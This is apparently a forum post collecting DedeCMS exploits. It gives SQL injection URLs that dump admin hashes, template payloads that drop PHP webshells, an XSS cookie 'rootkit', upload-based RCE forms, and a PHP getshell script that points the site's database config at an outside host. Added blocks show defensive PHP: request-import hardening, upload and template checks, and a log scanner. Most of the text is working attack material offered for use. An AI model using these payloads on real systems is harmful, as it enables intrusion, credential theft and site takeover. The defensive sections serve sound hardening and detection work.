
DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14
DedeCMS 5.6 rss.php SQL injection
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution
Register a member account and upload a piece of software; in the "local address" field enter:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant generates x.php, a one-line shell whose password is xiao.

DedeCMS 5.6 GBK SQL injection
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage XSS
1. Copy and paste the URL below and open it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-type XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser. From then on, opening either of the URLs below triggers our XSS, however the page is reached.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCMS v5.6-5.7 privilege bypass (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you are logged straight into the site backend.
This only works once the backend path is known.

DedeCMS (织梦) tag remote file write
Prerequisite: you must have your own DedeCMS database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

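The variable override getshell, the privilege bypass and the mytag_js.php form above all rest on the same flaw: request keys such as _COOKIE[GLOBALS][cfg_dbhost] or _POST[GLOBALS][cfg_dbhost] end up in the site's configuration. The PHP below is an added illustration, not DedeCMS's own code and not code from this post: a toy model of that request import beside a hardened one. The function names, the $scope array standing in for PHP's global variable table, and every sample value are assumptions; the key-rejection pattern is modelled on the "Request var not allow!" check that later DedeCMS versions added to their common include (exact wording there may differ).

```php
<?php
// Added example, not DedeCMS's own code: a toy model of the "every request key
// becomes a variable" import that the override payloads above abuse, beside a
// hardened import. $scope stands in for PHP's global variable table; the request
// arrays are constructed samples with placeholder values.

// Vulnerable model: each key of $_GET/$_POST/$_COOKIE is written into the scope,
// and a nested GLOBALS array is merged into it (the effect the payloads rely on).
function import_request_unsafe(array $scope, array $sources): array
{
    foreach ($sources as $source) {
        foreach ($source as $k => $v) {
            if ($k === 'GLOBALS' && is_array($v)) {
                $scope = array_merge($scope, $v);   // cfg_dbhost, cfg_dbuser ... replaced
            } else {
                $scope[$k] = $v;
            }
        }
    }
    return $scope;
}

// Hardened model: reject any request key that could name a config variable or a
// superglobal (pattern modelled on the "Request var not allow!" check later
// DedeCMS versions shipped; assumption, wording may differ), and keep request
// data in its own namespace instead of the global scope.
function import_request_safe(array $scope, array $sources): array
{
    foreach ($sources as $source) {
        foreach ($source as $k => $v) {
            if (preg_match('/^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_SERVER|_FILES|_SESSION)/i', (string) $k)) {
                throw new RuntimeException("Request var not allowed: $k");
            }
            $scope['request'][$k] = $v;   // isolated; can never overlap cfg_*
        }
    }
    return $scope;
}

// Constructed sample: the site's real settings plus a request shaped like the
// _COOKIE[GLOBALS][cfg_dbhost] / _POST[GLOBALS][cfg_dbhost] payloads above.
function demo(): array
{
    $config = ['cfg_dbhost' => 'localhost', 'cfg_dbuser' => 'site', 'cfg_dbprefix' => 'dede_'];
    $post   = ['doaction' => '/plus/mytag_js.php?aid=1', 'nocache' => 'true'];
    $cookie = ['GLOBALS' => ['cfg_dbhost' => 'db.attacker.example', 'cfg_dbuser' => 'exploit']];

    $result = ['unsafe_dbhost' => import_request_unsafe($config, [$post, $cookie])['cfg_dbhost']];
    try {
        import_request_safe($config, [$post, $cookie]);
        $result['safe'] = 'accepted';
    } catch (RuntimeException $e) {
        $result['safe'] = $e->getMessage();
    }
    return $result;
}

print_r(demo());
// unsafe_dbhost => db.attacker.example  (the site now talks to a foreign database)
// safe          => Request var not allowed: GLOBALS
```

The point for a defender is the second half: once request data lives in its own array and keys that collide with cfg_* or superglobal names are refused outright, a cookie or POST field can no longer redirect the database connection, which is the step every payload in this group needs first.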
DedeCMS <= V5.6 Final template execution
1. Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if the site reports that the edit succeeded, we have changed the template path.
3. Visit the edited article. Assuming the aid of the article just edited is 2, we only need to request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DedeCMS site management system Get Shell (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after upload, the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

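The template execution and Get Shell write-ups above, like the mytag_js.php one, depend on two things: a file the server stores as an image but later reads as a template containing runphp='yes' or {dede:php}, and a templet path that the member form is allowed to choose. The PHP below is an added example, not DedeCMS's own code and not code from this post, showing the checks a defender would put at the upload and template-selection points. The function names, the signature table and the sample byte strings are assumptions constructed for the demonstration.

```php
<?php
// Added example, not DedeCMS's own code: server-side checks against the
// "image that is really a template" trick used in the runphp / {dede:php}
// write-ups above. Sample file contents are constructed here.

// True when the bytes contain DedeCMS template tags that run PHP, or a raw PHP
// open tag, regardless of the claimed extension or a leading GIF89a marker.
function contains_executable_template(string $bytes): bool
{
    $patterns = [
        '/\{dede:[a-z0-9_]+[^}]*runphp\s*=\s*[\'"]?yes/i',   // {dede:field ... runphp='yes'}
        '/\{dede:php\b/i',                                    // {dede:php} ... {/dede:php}
        '/<\?(php\b|=)/i',                                    // raw PHP open tag
    ];
    foreach ($patterns as $p) {
        if (preg_match($p, $bytes) === 1) {
            return true;
        }
    }
    return false;
}

// An upload is accepted only if the extension is an image type, the real file
// header matches that type, and the body carries no template or PHP markup.
function is_acceptable_image_upload(string $filename, string $bytes): bool
{
    $signatures = [
        'gif'  => ["GIF87a", "GIF89a"],
        'jpg'  => ["\xFF\xD8\xFF"],
        'jpeg' => ["\xFF\xD8\xFF"],
        'png'  => ["\x89PNG\r\n\x1A\n"],
    ];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!isset($signatures[$ext])) {
        return false;                      // only image extensions are allowed here
    }
    $headerOk = false;
    foreach ($signatures[$ext] as $sig) {
        if (strncmp($bytes, $sig, strlen($sig)) === 0) {   // case-sensitive: "Gif89a" fails
            $headerOk = true;
        }
    }
    return $headerOk && !contains_executable_template($bytes);
}

// The article_edit forms above smuggle a user-chosen 'templet' path in through
// dede_addonfields. A template name taken from a request should never be used
// as-is; this allow-rule keeps it a plain .htm name with no traversal or absolute path.
function template_name_allowed(string $requested): bool
{
    $norm = str_replace('\\', '/', $requested);
    return $norm !== ''
        && $norm[0] !== '/'
        && strpos($norm, '..') === false
        && strpos($norm, "\0") === false
        && preg_match('/^[a-z0-9_\/.-]+\.htm$/i', $norm) === 1;
}

// Constructed samples: a genuine GIF header, the polyglot from the Get Shell
// write-up, and a {dede:php} body behind a GIF89a prefix.
$realGif  = "GIF89a\x01\x00\x01\x00\x80\x00\x00";
$polyglot = "Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}";
$phpTag   = "GIF89a{dede:php}\$fp = @fopen(\"1.php\", 'a');{/dede:php}";

var_dump(is_acceptable_image_upload('1.gif', $realGif));      // bool(true)
var_dump(is_acceptable_image_upload('1.gif', $polyglot));     // bool(false)
var_dump(is_acceptable_image_upload('1.jpg', $phpTag));       // bool(false)
var_dump(template_name_allowed('article_default.htm'));       // bool(true)
var_dump(template_name_allowed('../uploads/userup/3/1.gif')); // bool(false)
```

Neither check replaces the real fix, which is to stop accepting templet from the member form at all; but together they close the two places this group of write-ups passes through, a content check on what is stored under an image name and a name check on what may be handed to the template engine.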
DedeCMS (织梦) V5.6 remote file deletion
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving a 20-character value; to recover the 16-character MD5 from that, drop 3 more from the front and 1 from the end.

DedeCMS (织梦) 5.1 feedback_js.php injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 – 5.5 plus/digg_frame.php injection
It abuses an error raised by a MySQL numeric field overflow, combined with DedeCMS writing database error messages into a PHP file whose header is never validated.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit
http://www.abc.com/data/mysql_error_trace.php ; seeing the following confirms the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the step-2 output means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php injection
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
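As an added example that is not part of the original post, the following PHP turns the request shapes collected in this thread into a small access-log scanner a defender can run over combined-format logs during triage, or use as a starting point for WAF rules. The rule names, the parser and the sample log lines (with documentation-range IPs) are constructed here and are not from the post; the match patterns are taken from the URLs quoted above.

```php
<?php
// Added example, not part of the original post: a scanner that flags access-log
// lines matching the request shapes collected in this thread. The log lines
// below are constructed samples using documentation IP ranges, not real traffic.

// Decode twice so double-encoded payloads collapse, then lower-case for matching.
function decode_target(string $target): string
{
    return strtolower(rawurldecode(rawurldecode($target)));
}

// Each rule: a script name that must appear in the path, and a regex over the
// decoded request target. Patterns come from the URLs quoted in the thread.
function indicator_rules(): array
{
    return [
        'rss.php blind injection'     => ['rss.php',            '/_cs\[|updatexml\(/'],
        'advancedsearch raw sql'      => ['advancedsearch.php', '/[?&]sql=/'],
        'gotopage xss'                => ['login.php',          '/gotopage=[^&]*<script/'],
        'edit_face traversal delete'  => ['edit_face.php',      '/dopost=delold.*\.\.\//'],
        'digg_frame log injection'    => ['digg_frame.php',     '/\?>|<\?/'],
        'feedback_js union'           => ['feedback_js.php',    '/union\s+select/'],
        'infosearch union'            => ['infosearch.php',     '/union\s+select/'],
        'carbuyaction lfi'            => ['carbuyaction.php',   '/code=\.\.\//'],
        'globals/cfg override in url' => ['.php',               '/_(post|cookie|get)\[globals\]|[?&]cfg_db(host|user|pwd|name)=/'],
    ];
}

// Parses combined-format lines; returns one hit per (line, rule) match.
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/', $line, $m)) {
            continue;                        // not a combined-format line
        }
        [, $ip, $ts, $method, $target, $status] = $m;
        $decoded = decode_target($target);
        foreach (indicator_rules() as $rule => [$script, $regex]) {
            if (strpos($decoded, $script) !== false && preg_match($regex, $decoded) === 1) {
                $hits[] = ['line' => $n + 1, 'ip' => $ip, 'time' => $ts,
                           'method' => $method, 'status' => (int) $status, 'rule' => $rule];
            }
        }
    }
    return $hits;
}

// Constructed sample log (203.0.113.0/24, 198.51.100.0/24, 192.0.2.0/24 are documentation ranges).
$sampleLog = [
    '203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2012:10:43:01 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2012:10:43:09 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.3 - - [18/Oct/2012:10:44:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
];

foreach (scan_access_log($sampleLog) as $h) {
    printf("line %d  %-13s %d  %s\n", $h['line'], $h['ip'], $h['status'], $h['rule']);
}
// Expected: four hits (lines 1 to 4), nothing for the ordinary view.php request on line 5.
```

The mytag_js.php and select_soft_post.php variants carry their payload in POST bodies and cookies, which a standard access log does not record; for those, the 'globals/cfg override in url' rule only catches the query-string form, and the real signal has to come from request-body logging or from the application-level check shown earlier in this thread.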